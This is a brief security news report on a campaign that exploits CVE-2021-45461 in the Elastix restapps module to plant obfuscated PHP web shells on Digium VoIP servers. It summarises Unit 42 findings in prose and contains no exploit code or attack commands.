Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium’s software to install a web shell. This web shell has been designed to exfiltrate data by downloading and executing additional payloads.
Unit 42 researchers at Palo Alto Networks spotted a campaign targeting the Elastix system used in Digium phones since December 2021.
The hackers exploited a vulnerability, tracked as CVE-2021-45461 in the Rest Phone Apps (restapps) module to implant a web shell on VoIP servers. The attackers used the web shell to exfiltrate data by dropping additional payloads inside the target’s Digium phone software.
The researchers reported that they have witnessed a high volume of malicious traffic originating from more than 500,000 unique samples over the period spanning from mid-December 2021 till the end of March 2022. The traffic targets Digium open source Asterisk communication software for VoIP phone devices.
The malware installs multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution and schedules recurring tasks to re-infect the host system. The malware also implants a random junk string to each malware download in an attempt to evade signature defenses based on indicators of compromise.
Reports stated that the intrusions are similar to the INJ3CTOR3 campaign that was disclosed by Check Point.
The researchers concluded that the strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors. It is a common approach malware authors take to launch exploits or run commands remotely.